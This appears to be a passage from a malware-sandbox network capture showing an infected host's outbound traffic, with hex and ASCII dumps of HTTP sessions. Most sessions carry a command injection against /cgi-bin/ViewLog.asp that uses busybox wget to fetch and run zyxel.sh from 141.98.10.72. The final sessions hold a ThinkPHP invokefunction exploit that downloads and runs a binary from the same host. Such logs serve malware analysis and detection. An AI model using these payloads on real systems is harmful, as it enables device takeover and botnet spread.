6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
409	192.168.2.15	60982	94.110.210.79	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.446893930 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
410	192.168.2.15	56462	95.64.176.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.464442015 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:50.744344950 CET	604	IN	HTTP/1.1 404 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 X-Frame-Options: DENY Content-Disposition: inline;filename=f.txt Content-Type: application/json Transfer-Encoding: chunked Date: Wed, 14 Feb 2024 08:29:51 GMT Keep-Alive: timeout=60 Connection: keep-alive Data Raw: 37 39 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 32 2d 31 34 54 30 38 3a 32 39 3a 35 31 2e 32 37 35 2b 30 30 3a 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a Data Ascii: 79{"timestamp":"2024-02-14T08:29:51.275+00:00","status":404,"error":"Not Found","message":"","path":"/cgi-bin/ViewLog.asp"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
411	192.168.2.15	41818	94.120.211.248	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.472856045 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
412	192.168.2.15	32834	94.120.3.114	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.473370075 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
413	192.168.2.15	38380	31.200.62.209	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.474628925 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
414	192.168.2.15	33878	31.200.90.26	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.479384899 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
415	192.168.2.15	47730	95.86.66.142	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.481355906 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
416	192.168.2.15	33620	31.136.233.239	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.649065018 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:51.321542025 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:52.665466070 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:55.481657982 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:00.857239962 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:11.608999968 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.112282038 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119142056 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
417	192.168.2.15	55506	31.136.232.28	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.660676003 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:51.353494883 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:52.697446108 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:55.481573105 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:00.857261896 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:11.608980894 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.112339020 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119189024 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
418	192.168.2.15	33632	85.70.246.168	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.661531925 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:50.885072947 CET	502	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:50 GMT Server: Apache/2.4.25 (Raspbian) Content-Length: 306 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Raspbian) Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
419	192.168.2.15	35868	62.29.72.63	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.711884022 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
420	192.168.2.15	42526	94.120.149.102	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.720237970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
421	192.168.2.15	42730	88.99.64.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:51.033750057 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:51.236901999 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:50 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
422	192.168.2.15	43780	95.101.247.127	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:51.437944889 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
